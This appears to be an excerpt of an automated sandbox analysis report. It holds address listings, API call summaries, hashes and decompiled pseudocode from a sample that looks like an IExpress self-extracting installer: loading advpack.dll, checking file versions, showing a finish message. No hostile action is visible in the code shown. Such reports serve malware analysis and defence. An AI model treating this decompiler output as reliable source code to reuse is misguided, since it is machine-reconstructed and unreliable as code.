                                                                                                                                                                                                        0x001f398f
                                                                                                                                                                                                        0x001f39af
                                                                                                                                                                                                        0x001f39b6
                                                                                                                                                                                                        0x001f3a0f
                                                                                                                                                                                                        0x001f3a0f
                                                                                                                                                                                                        0x001f3a11
                                                                                                                                                                                                        0x001f3a13
                                                                                                                                                                                                        0x001f3a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39b8
                                                                                                                                                                                                        0x001f39b8
                                                                                                                                                                                                        0x001f39ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39bc
                                                                                                                                                                                                        0x001f39bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39c3
                                                                                                                                                                                                        0x001f39c9
                                                                                                                                                                                                        0x001f39ce
                                                                                                                                                                                                        0x001f39d0
                                                                                                                                                                                                        0x001f39e3
                                                                                                                                                                                                        0x001f39e5
                                                                                                                                                                                                        0x001f39e6
                                                                                                                                                                                                        0x001f39f1
                                                                                                                                                                                                        0x001f39f7
                                                                                                                                                                                                        0x001f39fa
                                                                                                                                                                                                        0x001f3a01
                                                                                                                                                                                                        0x001f3a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3a06
                                                                                                                                                                                                        0x001f3a09
                                                                                                                                                                                                        0x001f3a09
                                                                                                                                                                                                        0x001f3a0b
                                                                                                                                                                                                        0x001f3a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3a09
                                                                                                                                                                                                        0x001f39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39fc
                                                                                                                                                                                                        0x001f39d3
                                                                                                                                                                                                        0x001f39d8
                                                                                                                                                                                                        0x001f39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f39dc
                                                                                                                                                                                                        0x001f39b6
                                                                                                                                                                                                        0x001f3955
                                                                                                                                                                                                        0x001f395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3961
                                                                                                                                                                                                        0x001f3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3969
                                                                                                                                                                                                        0x001f3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3969
                                                                                                                                                                                                        0x001f3915
                                                                                                                                                                                                        0x001f3915
                                                                                                                                                                                                        0x001f391b
                                                                                                                                                                                                        0x001f391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f392d
                                                                                                                                                                                                        0x001f3933
                                                                                                                                                                                                        0x001f3938
                                                                                                                                                                                                        0x001f393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3940
                                                                                                                                                                                                        0x001f3946
                                                                                                                                                                                                        0x001f394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38f2
                                                                                                                                                                                                        0x001f3843
                                                                                                                                                                                                        0x001f3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f384b
                                                                                                                                                                                                        0x001f384d
                                                                                                                                                                                                        0x001f3883
                                                                                                                                                                                                        0x001f3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f389a
                                                                                                                                                                                                        0x001f389e
                                                                                                                                                                                                        0x001f389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38a0
                                                                                                                                                                                                        0x001f38a0
                                                                                                                                                                                                        0x001f38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38a4
                                                                                                                                                                                                        0x001f384f
                                                                                                                                                                                                        0x001f3851
                                                                                                                                                                                                        0x001f3857
                                                                                                                                                                                                        0x001f386e
                                                                                                                                                                                                        0x001f3877
                                                                                                                                                                                                        0x001f387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3881
                                                                                                                                                                                                        0x001f3859
                                                                                                                                                                                                        0x001f385c
                                                                                                                                                                                                        0x001f3862
                                                                                                                                                                                                        0x001f3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f38f4
                                                                                                                                                                                                        0x001f38f4
                                                                                                                                                                                                        0x001f38f5
                                                                                                                                                                                                        0x001f38fb
                                                                                                                                                                                                        0x001f3901
                                                                                                                                                                                                        0x001f3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f390a
                                                                                                                                                                                                        0x001f374b
                                                                                                                                                                                                        0x001f374e
                                                                                                                                                                                                        0x001f375c
                                                                                                                                                                                                        0x001f3764
                                                                                                                                                                                                        0x001f3769
                                                                                                                                                                                                        0x001f376e
                                                                                                                                                                                                        0x001f3771
                                                                                                                                                                                                        0x001f379c
                                                                                                                                                                                                        0x001f379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f37a3
                                                                                                                                                                                                        0x001f37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f37a4
                                                                                                                                                                                                        0x001f3773
                                                                                                                                                                                                        0x001f3777
                                                                                                                                                                                                        0x001f3778
                                                                                                                                                                                                        0x001f377f
                                                                                                                                                                                                        0x001f3781
                                                                                                                                                                                                        0x001f378e
                                                                                                                                                                                                        0x001f378e
                                                                                                                                                                                                        0x001f3794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3794
                                                                                                                                                                                                        0x001f3783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f3785
                                                                                                                                                                                                        0x001f378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f378c
                                                                                                                                                                                                        0x001f3750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f372d
                                                                                                                                                                                                        0x001f372d
                                                                                                                                                                                                        0x001f396b
                                                                                                                                                                                                        0x001f396b
                                                                                                                                                                                                        0x001f396c
                                                                                                                                                                                                        0x001f396e
                                                                                                                                                                                                        0x001f396f
                                                                                                                                                                                                        0x001f3a1e
                                                                                                                                                                                                        0x001f3a1e
                                                                                                                                                                                                        0x001f3a22
                                                                                                                                                                                                        0x001f3a27
                                                                                                                                                                                                        0x001f3a3e
                                                                                                                                                                                                        0x001f3a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 001F3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 001F39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 001F39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: 44256459c70e09bff86a34326e7e49f7cb6b448eecc2a8aaba9762f19d73a089
                                                                                                                                                                                                        • Instruction ID: ba51b7bad9a71e0de9542d1b71ec26b3902f8902553fc3d9d57f3702e11bd923
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44256459c70e09bff86a34326e7e49f7cb6b448eecc2a8aaba9762f19d73a089
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B191E4B1A0122C9FDB39DB25CC817BAB7A0BB45304F1501A9DAA9D7251D7B48F81CB41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E001F6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E001F1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E001F658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x001f6495
                                                                                                                                                                                                        0x001f6495
                                                                                                                                                                                                        0x001f64a0
                                                                                                                                                                                                        0x001f64a7
                                                                                                                                                                                                        0x001f64ab
                                                                                                                                                                                                        0x001f64bd
                                                                                                                                                                                                        0x001f64c2
                                                                                                                                                                                                        0x001f64d3
                                                                                                                                                                                                        0x001f64df
                                                                                                                                                                                                        0x001f64e8
                                                                                                                                                                                                        0x001f6502
                                                                                                                                                                                                        0x001f64ee
                                                                                                                                                                                                        0x001f64f9
                                                                                                                                                                                                        0x001f64f9
                                                                                                                                                                                                        0x001f6516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001F64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001F64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001F6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-3736221019
                                                                                                                                                                                                        • Opcode ID: 389514127c8aa0a813d6bb330b17e685abe705bbfcdb294d605305148ae03d37
                                                                                                                                                                                                        • Instruction ID: 70ef3dee2c145717aace1dfc8d5956eeb71d0c9f0b050e810319905f32bc311a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 389514127c8aa0a813d6bb330b17e685abe705bbfcdb294d605305148ae03d37
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DF018170A0410CABDB54EB64DC49EFA7778EBA4310F900295F689A21D0DF74AECACA51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E001F2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E001F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E001F2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x001f28f1
                                                                                                                                                                                                        0x001f28f4
                                                                                                                                                                                                        0x001f28f7
                                                                                                                                                                                                        0x001f28f9
                                                                                                                                                                                                        0x001f28fc
                                                                                                                                                                                                        0x001f28ff
                                                                                                                                                                                                        0x001f2901
                                                                                                                                                                                                        0x001f2907
                                                                                                                                                                                                        0x001f2a62
                                                                                                                                                                                                        0x001f2a64
                                                                                                                                                                                                        0x001f290d
                                                                                                                                                                                                        0x001f290d
                                                                                                                                                                                                        0x001f290f
                                                                                                                                                                                                        0x001f2912
                                                                                                                                                                                                        0x001f2920
                                                                                                                                                                                                        0x001f2937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2944
                                                                                                                                                                                                        0x001f294a
                                                                                                                                                                                                        0x001f294f
                                                                                                                                                                                                        0x001f2a2f
                                                                                                                                                                                                        0x001f2a32
                                                                                                                                                                                                        0x001f2a34
                                                                                                                                                                                                        0x001f2a37
                                                                                                                                                                                                        0x001f2a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2955
                                                                                                                                                                                                        0x001f295e
                                                                                                                                                                                                        0x001f2962
                                                                                                                                                                                                        0x001f2969
                                                                                                                                                                                                        0x001f296f
                                                                                                                                                                                                        0x001f2974
                                                                                                                                                                                                        0x001f298c
                                                                                                                                                                                                        0x001f2a20
                                                                                                                                                                                                        0x001f2a21
                                                                                                                                                                                                        0x001f2a27
                                                                                                                                                                                                        0x001f2a4c
                                                                                                                                                                                                        0x001f2a4f
                                                                                                                                                                                                        0x001f2a50
                                                                                                                                                                                                        0x001f2a53
                                                                                                                                                                                                        0x001f2a56
                                                                                                                                                                                                        0x001f2a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f29b2
                                                                                                                                                                                                        0x001f29b2
                                                                                                                                                                                                        0x001f29b5
                                                                                                                                                                                                        0x001f29bd
                                                                                                                                                                                                        0x001f29c3
                                                                                                                                                                                                        0x001f29cc
                                                                                                                                                                                                        0x001f29d5
                                                                                                                                                                                                        0x001f29d7
                                                                                                                                                                                                        0x001f29da
                                                                                                                                                                                                        0x001f29dd
                                                                                                                                                                                                        0x001f29df
                                                                                                                                                                                                        0x001f29ec
                                                                                                                                                                                                        0x001f29f8
                                                                                                                                                                                                        0x001f29fc
                                                                                                                                                                                                        0x001f29ff
                                                                                                                                                                                                        0x001f2a02
                                                                                                                                                                                                        0x001f2a07
                                                                                                                                                                                                        0x001f2a0a
                                                                                                                                                                                                        0x001f2a0f
                                                                                                                                                                                                        0x001f2a19
                                                                                                                                                                                                        0x001f2a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2a0f
                                                                                                                                                                                                        0x001f298c
                                                                                                                                                                                                        0x001f2974
                                                                                                                                                                                                        0x001f2962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f294f
                                                                                                                                                                                                        0x001f2912
                                                                                                                                                                                                        0x001f2a65
                                                                                                                                                                                                        0x001f2a68
                                                                                                                                                                                                        0x001f2a6c
                                                                                                                                                                                                        0x001f2a6f
                                                                                                                                                                                                        0x001f2a6f
                                                                                                                                                                                                        0x001f2a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 001F2A6F
                                                                                                                                                                                                          • Part of subcall function 001F2773: CharUpperA.USER32(FCDC6E1A,00000000,00000000,00000000), ref: 001F27A8
                                                                                                                                                                                                          • Part of subcall function 001F2773: CharNextA.USER32(0000054D), ref: 001F27B5
                                                                                                                                                                                                          • Part of subcall function 001F2773: CharNextA.USER32(00000000), ref: 001F27BC
                                                                                                                                                                                                          • Part of subcall function 001F2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2829
                                                                                                                                                                                                          • Part of subcall function 001F2773: RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2852
                                                                                                                                                                                                          • Part of subcall function 001F2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F2870
                                                                                                                                                                                                          • Part of subcall function 001F2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001F28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,001F3938,?,?,?,?,-00000005), ref: 001F2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 001F2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,001F3938,?,?,?,?,-00000005,?), ref: 001F2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 001F2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 209257c1f483a828c27c12e05e9ceac6f19a80822f48fe440d64bb436b2f19f9
                                                                                                                                                                                                        • Instruction ID: 121f4c1331ef5028e77f8d4c210b54685bbcd8012312a5724216ae126f2f3f96
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 209257c1f483a828c27c12e05e9ceac6f19a80822f48fe440d64bb436b2f19f9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C513671E0021DEBCB21CF98D884ABEBBB5FF48700F14412AEA05E3651DB359A41DBA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E001F4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E001F468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E001F468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E001F44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x001f417d
                                                                                                                                                                                                        0x001f418f
                                                                                                                                                                                                        0x001f4193
                                                                                                                                                                                                        0x001f41b7
                                                                                                                                                                                                        0x001f41d3
                                                                                                                                                                                                        0x001f41e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f41e7
                                                                                                                                                                                                        0x001f41d5
                                                                                                                                                                                                        0x001f41d6
                                                                                                                                                                                                        0x001f41d8
                                                                                                                                                                                                        0x001f41d9
                                                                                                                                                                                                        0x001f41da
                                                                                                                                                                                                        0x001f41df
                                                                                                                                                                                                        0x001f41e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f41e1
                                                                                                                                                                                                        0x001f41b9
                                                                                                                                                                                                        0x001f41ba
                                                                                                                                                                                                        0x001f41bc
                                                                                                                                                                                                        0x001f41bd
                                                                                                                                                                                                        0x001f41be
